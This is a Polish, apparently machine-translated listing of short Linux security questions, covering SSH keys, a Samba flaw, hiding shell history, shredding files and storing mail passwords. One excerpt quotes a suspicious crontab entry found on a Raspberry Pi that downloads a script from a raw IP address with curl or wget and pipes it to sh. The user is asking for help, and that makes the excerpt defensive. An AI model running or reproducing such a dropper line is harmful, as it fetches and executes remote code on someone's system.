Niezbędne treści związane z bezpieczeństwem komputerowym, tj. Treści dotyczące zasad, mechanizmów itp. Zapewniają, że dane nie wyciekają ani nie są uszkodzone, a usługi są dostępne we wszystkich okolicznościach.
Mam uzyskiwać dostęp do serwera, aby połączyć serwery pośrednie i tymczasowe firmy z naszą pętlą wdrażania. Administrator po swojej stronie skonfigurował te dwie instancje, a następnie utworzył użytkownika na serwerze dla SSH w as. Do tego jestem przyzwyczajony. Teraz myślę, że wyślę im mój klucz publiczny, który można umieścić w …
Zgodnie z artykułem rapid7 istnieje kilka wrażliwych wersji Samby umożliwiających zdalne wykonanie kodu w systemach Linux: Podczas gdy ransomworm WannaCry wpłynął na systemy Windows i był łatwy do zidentyfikowania, przy wyraźnych krokach naprawczych, luka w Sambie wpłynie na systemy Linux i Unix i może stanowić poważne techniczne przeszkody w uzyskaniu …
Moja maszyna jest serwerem, więc chcę zignorować połączenia z moim serwerem (np. Gdy ktoś odwiedza moją stronę internetową). Chcę, aby mój serwer wysyłał tylko połączenia / żądania do innych miejsc. Jak wyświetlić tylko te połączenia wychodzące? EDYCJA: Jestem nowy w tego typu rzeczach. Próbuję tylko sprawdzić, czy wysyłane są cokolwiek …
Jakiś czas temu zauważyłem, że nazwy użytkowników i hasła podane curljako argumenty wiersza poleceń nie pojawiają się w psdanych wyjściowych (chociaż oczywiście mogą pojawiać się w twojej historii bashów). Podobnie nie pojawiają się w /proc/PID/cmdline. (Można jednak określić długość połączonego argumentu nazwa użytkownika / hasło.) Pokaz poniżej: [root@localhost ~]# nc …
Mamy mały problem na serwerze. Chcemy, aby niektórzy użytkownicy mogli np. Być sudorootem, ale z zastrzeżeniem, że użytkownik nie może zmienić hasła roota. Oznacza to, że nadal możemy zalogować się na tym serwerze i zostać rootem bez względu na to, co zrobią inni użytkownicy. Czy to jest możliwe?
Czy jest jakiś sposób na powstrzymanie dodawania polecenia do twojej historii? Mam polecenie, które chcę trzymać z dala od mojego pliku historii, i tak naprawdę nie dbam o to, aby było tam, gdy przeszukuję historię zapisaną w pamięci, ale to mniej niepokoi. Czy jest jakiś sposób, aby temu zapobiec, czy …
Obecnie pracuję zdalnie dla wielu organizacji, które wymagają regularnego uzyskiwania dostępu do swoich serwerów w celu konserwacji i aktualizacji. Czy mogę bezpiecznie dodać mój publiczny klucz SSH RSA do .ssh/authorized_keyspliku, aby umożliwić mi znacznie szybsze logowanie / bez konieczności wyszukiwania haseł? Działam przy założeniu, że wygenerowanie klucza prywatnego z klucza …
Po przeczytaniu tego przewodnika próbuję przenieść niektóre foldery (takie jak /vari /home) na osobną partycję: 3.2.1 Wybierz inteligentny schemat partycji Udało mi się przenieść jeden folder z powodzeniem zgodnie z tym przewodnikiem. Jednak wydaje się, że to nie działa w przypadku wielu folderów, a wszystkie moje foldery są zrzucane na …
Chciałem dodać coś do mojego głównego pliku crontab na moim Raspberry Pi i znalazłem wpis, który wydaje mi się podejrzany, szukając części tego w Google nic nie znalazłem. Wpis Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Zawartość http://103.219.112.66:8000/i.shto: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir …
Używam Chromium tak: chromium --no-sandbox Robię to, ponieważ uruchamiam Debian Squeeze na kontenerze VM OpenVZ i jest to jedyny sposób, w jaki mogę go uruchomić. Chociaż wciąż czytam, to jest okropne . Ale chcę wiedzieć, dlaczego dokładnie. Czy ktoś może mi to wytłumaczyć? Czy ktoś musi włamać się do komputera, …
To bardziej bezczynna ciekawość niż cokolwiek innego. Mój przyjaciel zapytał mnie „jaki zakres portów może używać tylko root w Linuksie?” Powiedziałem mu, że 0-1024 są ograniczone. Potem zapytał mnie, dlaczego tak jest i ... byłem zagubiony. Nie mam pojęcia. Czy istnieje powód, dla którego porty te są ograniczone, a 1025-65535 …
Mój plik .muttrc wygląda coś jak ten jeden lub zobacz poniżej spojrzenie. Waham się z hasłem. Jak przechowywać hasło, aby z niego korzystać mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"
Wygenerowałem i pobrałem .pemklucz prywatny z AWS. Jednak aby użyć Putty do połączenia z maszyną wirtualną, muszę mieć ten klucz w .ppkformacie. Proces konwersji opisano szczegółowo w około 20 wierszach: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Używam Linux Mint (dystrybucja Ubuntu) i wiem, że mogę używać puttygen w terminalu. Nie mam jednak pojęcia, jak korzystać …
Mam proces, który nasłuchuje 2 portów: 45136 / tcp i 37208 / udp (w rzeczywistości zakładam, że jest to ten sam proces). Ale netstat nie zwraca żadnego pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Ten sam wynik z „grep 37208”. Próbowałem też lsof: lsof …
Mam drzewo katalogów, które chciałbym zniszczyć za pomocą narzędzia Linux „shred”. Niestety, niszczenie nie ma -Ropcji niszczenia rekurencyjnego. Jak mogę zniszczyć rekurencyjnie całe drzewo katalogów?
Używamy plików cookie i innych technologii śledzenia w celu poprawy komfortu przeglądania naszej witryny, aby wyświetlać spersonalizowane treści i ukierunkowane reklamy, analizować ruch w naszej witrynie, i zrozumieć, skąd pochodzą nasi goście.
Kontynuując, wyrażasz zgodę na korzystanie z plików cookie i innych technologii śledzenia oraz potwierdzasz, że masz co najmniej 16 lat lub zgodę rodzica lub opiekuna.